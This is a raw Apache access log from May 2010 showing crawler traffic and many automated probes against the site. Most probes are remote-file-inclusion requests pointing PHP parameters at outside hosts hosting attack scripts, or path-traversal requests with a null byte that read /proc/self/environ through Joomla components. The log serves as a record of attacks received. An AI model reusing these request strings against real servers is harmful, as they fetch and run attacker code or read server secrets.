67.195.112.180 - - [11/May/2010:09:51:23 -0500] "GET /logs/access_log.1233705600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.30.181.5 - - [11/May/2010:09:52:22 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:09:52:22 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:09:52:22 -0500] "GET /logs/access_log.1262736000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
111.89.128.186 - - [11/May/2010:09:52:54 -0500] "GET //poll/poll_ssi.php?include_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
111.89.128.186 - - [11/May/2010:09:52:54 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
121.78.118.123 - - [11/May/2010:09:55:18 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.78.118.123 - - [11/May/2010:09:55:18 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [11/May/2010:09:55:19 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.199.52 - - [11/May/2010:09:57:40 -0500] "GET /logs/access_log.1206748800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.118.123 - - [11/May/2010:09:57:46 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
111.89.128.186 - - [11/May/2010:09:58:32 -0500] "GET //poll/poll_ssi.php?include_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
111.89.128.186 - - [11/May/2010:09:58:33 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
207.46.199.44 - - [11/May/2010:09:58:39 -0500] "GET /logs/access_log.1162944000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.76.99.89 - - [11/May/2010:10:01:01 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
91.76.99.89 - - [11/May/2010:10:01:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
91.76.99.89 - - [11/May/2010:10:01:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
217.16.18.219 - - [11/May/2010:10:01:16 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:01:16 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:03:13 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.149.84.14 - - [11/May/2010:10:04:20 -0500] "GET /logs//login.php?svr_rootscript=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:10:04:20 -0500] "GET //login.php?svr_rootscript=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:10:04:20 -0500] "GET /logs/access_log.1263254400//login.php?svr_rootscript=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:10:05:17 -0500] "GET /logs//login.php?svr_rootscript=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:10:05:17 -0500] "GET /logs/access_log.1263254400//login.php?svr_rootscript=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:10:05:17 -0500] "GET //login.php?svr_rootscript=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.195.112.180 - - [11/May/2010:10:06:01 -0500] "GET /logs/?S=D HTTP/1.0" 200 5111 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.39.130.176 - - [11/May/2010:10:06:20 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
217.16.18.219 - - [11/May/2010:10:07:22 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:07:22 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:07:32 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:07:33 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.39.130.176 - - [11/May/2010:10:07:39 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.39.130.176 - - [11/May/2010:10:07:52 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
217.16.18.219 - - [11/May/2010:10:07:59 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:07:59 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:08:04 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:08:05 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:10:08:19 -0500] "GET /logs/access_log.1177804800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.41 - - [11/May/2010:10:08:58 -0500] "GET /logs/access_log.1237334400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
111.89.128.186 - - [11/May/2010:10:10:17 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
111.89.128.186 - - [11/May/2010:10:10:18 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
211.39.130.176 - - [11/May/2010:10:10:28 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.46.13.95 - - [11/May/2010:10:12:39 -0500] "GET /logs/access_log.1204329600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.139 - - [11/May/2010:10:12:47 -0500] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:10:12:47 -0500] "GET //wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:10:12:47 -0500] "GET /logs/access_log.1270512000//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:10:12:49 -0500] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:10:12:49 -0500] "GET //wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:10:12:49 -0500] "GET /logs/access_log.1270512000//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
207.46.199.48 - - [11/May/2010:10:13:09 -0500] "GET /logs/access_log.1207526400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.39.130.176 - - [11/May/2010:10:15:45 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.39.130.176 - - [11/May/2010:10:15:45 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.39.130.176 - - [11/May/2010:10:15:46 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
207.46.13.92 - - [11/May/2010:10:16:10 -0500] "GET /logs/access_log.1226102400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.182 - - [11/May/2010:10:16:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.164 - - [11/May/2010:10:17:23 -0500] "GET /logs/access_log.1204416000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
88.191.94.188 - - [11/May/2010:10:17:28 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:17:28 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:17:28 -0500] "GET /logs/access_log.1264809600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:17:28 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:17:31 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:17:31 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:17:31 -0500] "GET /logs/access_log.1264809600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:17:31 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:18:07 -0500] "GET /logs/access_log.1268956800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:18:13 -0500] "GET /logs/access_log.1268956800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
211.39.130.176 - - [11/May/2010:10:19:55 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.39.130.176 - - [11/May/2010:10:19:55 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.39.130.176 - - [11/May/2010:10:19:56 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
209.62.121.162 - - [11/May/2010:10:20:41 -0500] "GET /logs/access_log.1221609600/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
209.62.121.162 - - [11/May/2010:10:20:41 -0500] "GET /mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.62.121.162 - - [11/May/2010:10:20:41 -0500] "GET /logs/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.62.121.162 - - [11/May/2010:10:20:42 -0500] "GET /logs/access_log.1217548800/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.195.112.180 - - [11/May/2010:10:20:48 -0500] "GET /logs/access_log.1219449600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.36.1.97 - - [11/May/2010:10:21:06 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.76.99.89 - - [11/May/2010:10:22:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
217.16.18.219 - - [11/May/2010:10:28:35 -0500] "GET /logs//index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.16.18.219 - - [11/May/2010:10:28:35 -0500] "GET //index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [11/May/2010:10:29:33 -0500] "GET /logs/access_log.1262390400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:29:33 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:29:33 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:29:33 -0500] "GET /logs/access_log.1265068800//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:29:54 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:29:54 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:29:54 -0500] "GET /logs/access_log.1262390400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [11/May/2010:10:29:54 -0500] "GET /logs/access_log.1265068800//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
174.36.1.97 - - [11/May/2010:10:30:00 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:10:30:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:10:30:01 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
219.240.36.36 - - [11/May/2010:10:30:01 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://ssp3.ilawa.pl/components/com_zoom/tabs/do??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
219.240.36.36 - - [11/May/2010:10:30:01 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://ssp3.ilawa.pl/components/com_zoom/tabs/do??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
219.240.36.36 - - [11/May/2010:10:30:01 -0500] "GET /?INCLUDE_FOLDER=http://ssp3.ilawa.pl/components/com_zoom/tabs/do??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
219.240.36.36 - - [11/May/2010:10:30:01 -0500] "GET /logs/?INCLUDE_FOLDER=http://ssp3.ilawa.pl/components/com_zoom/tabs/do??? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
189.108.172.26 - - [11/May/2010:10:30:29 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.108.172.26 - - [11/May/2010:10:30:32 -0500] "GET /?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
189.108.172.26 - - [11/May/2010:10:30:32 -0500] "GET /logs/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
189.108.172.26 - - [11/May/2010:10:30:32 -0500] "GET /logs/access_log.1266451200/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.39.130.176 - - [11/May/2010:10:30:37 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.39.130.176 - - [11/May/2010:10:30:38 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.39.130.176 - - [11/May/2010:10:30:39 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.239.121.204 - - [11/May/2010:10:35:00 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.46.195.234 - - [11/May/2010:10:35:09 -0500] "GET /logs/access_log.1249862400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.240.36.36 - - [11/May/2010:10:35:35 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.240.36.36 - - [11/May/2010:10:35:35 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
219.240.36.36 - - [11/May/2010:10:35:35 -0500] "GET /src/admin/pt_upload.php?config_file=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
219.240.36.36 - - [11/May/2010:10:35:36 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.195.112.180 - - [11/May/2010:10:36:53 -0500] "GET /logs/access_log.1186617600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.115.6.16 - - [11/May/2010:10:38:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Sosospider+(+http://help.soso.com/webspider.htm)"
213.91.132.141 - - [11/May/2010:10:40:39 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
213.91.132.141 - - [11/May/2010:10:40:39 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
213.91.132.141 - - [11/May/2010:10:40:39 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
207.46.195.234 - - [11/May/2010:10:42:09 -0500] "GET /logs/access_log.1158192000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [11/May/2010:10:43:32 -0500] "GET /logs/access_log.1196899200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.43 - - [11/May/2010:10:51:09 -0500] "GET /logs/access_log.1195689600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [11/May/2010:10:56:04 -0500] "GET /logs/access_log.1197331200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.108.172.26 - - [11/May/2010:10:57:36 -0500] "GET /logs/access_log.1273276800//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.808"
189.108.172.26 - - [11/May/2010:10:57:36 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.808"
189.108.172.26 - - [11/May/2010:10:57:37 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.808"
67.195.112.180 - - [11/May/2010:11:06:05 -0500] "GET /logs/access_log.1181001600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.146.200 - - [11/May/2010:11:10:40 -0500] "GET //administrator/index3.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.55.146.200 - - [11/May/2010:11:10:41 -0500] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
218.149.84.14 - - [11/May/2010:11:11:03 -0500] "GET /logs/access_log.1264204800//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:11:03 -0500] "GET /logs/access_log.1266451200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:11:03 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:11:03 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:11:06 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:11:06 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:11:06 -0500] "GET /logs/access_log.1266451200//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:11:11:06 -0500] "GET /logs/access_log.1264204800//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.218.116.130 - - [11/May/2010:11:11:38 -0500] "GET /logs/access_log.1234051200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
